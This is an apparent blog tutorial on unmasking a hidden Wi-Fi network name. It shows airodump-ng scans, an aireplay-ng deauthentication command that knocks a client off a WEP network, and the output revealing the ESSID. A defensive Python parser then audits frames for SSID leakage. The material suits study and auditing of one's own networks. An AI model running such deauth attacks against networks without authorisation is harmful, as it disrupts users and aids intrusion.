Sometimes airodump-ng won't show you the ESSID of an access point and lists only its length instead. You'll need the ESSID so you can do the fake authentication attack.
 
root@segfault:/home/cg/eric-g# airodump-ng ath0 --bssid 00:14:BF:9D:BA:DA -c 11
 CH 11 ][ Elapsed: 9 s ][ 2007-11-25 23:43
                                                                                                         
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                         
 00:14:BF:9D:BA:DA   13  37       98       15    2  11  48  WEP  WEP         (length:  7)
                                
 BSSID              STATION            PWR  Lost  Packets  Probes      
                                                                                                                                     
 00:14:BF:9D:BA:DA  00:11:95:BD:77:79   -1     0        1                                                
 00:14:BF:9D:BA:DA  00:17:3F:74:80:D6    6    11        7

The solution to that is to deauth a client on the network; when they re-authenticate, the ESSID should present itself.

root@segfault:/home/cg/casa# aireplay-ng -0 10 -a 00:14:BF:9D:BA:DA -c 00:17:3F:74:80:D6 ath0
23:45:50  Sending DeAuth to station   -- STMAC: [00:17:3F:74:80:D6]
23:45:51  Sending DeAuth to station   -- STMAC: [00:17:3F:74:80:D6]
23:45:52  Sending DeAuth to station   -- STMAC: [00:17:3F:74:80:D6]
23:45:53  Sending DeAuth to station   -- STMAC: [00:17:3F:74:80:D6]
23:45:55  Sending DeAuth to station   -- STMAC: [00:17:3F:74:80:D6]
23:45:56  Sending DeAuth to station   -- STMAC: [00:17:3F:74:80:D6]
23:45:57  Sending DeAuth to station   -- STMAC: [00:17:3F:74:80:D6]
23:45:58  Sending DeAuth to station   -- STMAC: [00:17:3F:74:80:D6]
23:45:59  Sending DeAuth to station   -- STMAC: [00:17:3F:74:80:D6]
23:46:01  Sending DeAuth to station   -- STMAC: [00:17:3F:74:80:D6]

Watch your airodump-ng output and the ESSID should change from (length: #) to the actual ESSID.

 CH 11 ][ Elapsed: 1 min ][ 2007-11-25 23:46
                                                                                                         
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                         
 00:14:BF:9D:BA:DA   12  83     1093      122    5  11  48  WEP  WEP    OPN  general
                                                                                                         
 BSSID              STATION            PWR  Lost  Packets  Probes           
                                                                                                         
 00:14:BF:9D:BA:DA  00:17:3F:74:80:D6    5     0      651                                                
 00:14:BF:9D:BA:DA  00:11:95:BD:77:79   -1     0        2

Our ESSID is "general".
-CG
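
Why the name shows up, and why a cloaked ESSID is not an access control: the beacon only blanks the SSID element, while reassociation requests and probe responses carry it in cleartext even on an encrypted network. The parser below is an added example, not code from the original post; the function names are illustrative and the frames are constructed from the MAC addresses and ESSID shown above (no radiotap header, no FCS).

```python
# Added example: frames below are constructed, not captured traffic.
FIXED_LEN = {0: 4, 2: 10, 5: 12, 8: 12}   # fixed-field bytes before tagged elements
SUBTYPE = {0: "assoc-req", 2: "reassoc-req", 5: "probe-resp", 8: "beacon"}

def mac(b):
    return ":".join(f"{x:02X}" for x in b)

def parse_ssid(frame):
    """Return (subtype, bssid, ssid_bytes) for a management frame, else None."""
    if len(frame) < 24:
        return None
    ftype, subtype = (frame[0] >> 2) & 0x3, (frame[0] >> 4) & 0xF
    if ftype != 0 or subtype not in FIXED_LEN:
        return None
    pos = 24 + FIXED_LEN[subtype]          # skip MAC header and fixed fields
    while pos + 2 <= len(frame):
        eid, elen = frame[pos], frame[pos + 1]
        body = frame[pos + 2:pos + 2 + elen]
        if len(body) < elen:               # truncated element
            return None
        if eid == 0:                       # element ID 0 is the SSID
            return SUBTYPE[subtype], mac(frame[16:22]), body  # addr3 = BSSID
        pos += 2 + elen
    return None

def audit(frames):
    """Per BSSID: cloaked beacon SSID length and where the real name appears."""
    report = {}
    for f in frames:
        parsed = parse_ssid(f)
        if parsed is None:
            continue
        subtype, bssid, ssid = parsed
        entry = report.setdefault(bssid, {"cloaked_len": None, "cleartext": {}})
        if not any(ssid):                  # zero-length or all-NUL: name withheld
            entry["cloaked_len"] = len(ssid)
        else:
            name = ssid.decode("utf-8", "replace")
            entry["cleartext"].setdefault(name, []).append(subtype)
    return report

def build(subtype, dst, src, bssid, ssid):
    """Construct a minimal management frame (no radiotap header, no FCS)."""
    hdr = bytes([subtype << 4, 0, 0, 0]) + dst + src + bssid + b"\x00\x00"
    return hdr + bytes(FIXED_LEN[subtype]) + bytes([0, len(ssid)]) + ssid + b"\x01\x01\x82"

AP, STA = bytes.fromhex("0014BF9DBADA"), bytes.fromhex("00173F7480D6")
SAMPLE = [build(8, b"\xff" * 6, AP, AP, b"\x00" * 7),   # beacon, name blanked
          build(2, AP, STA, AP, b"general"),             # client reassociates
          build(5, STA, AP, AP, b"general")]             # AP probe response

if __name__ == "__main__":
    print(audit(SAMPLE))
```

Run over an audit capture of your own network, any BSSID that has both a `cloaked_len` and a `cleartext` entry is advertising its name despite the cloaking setting.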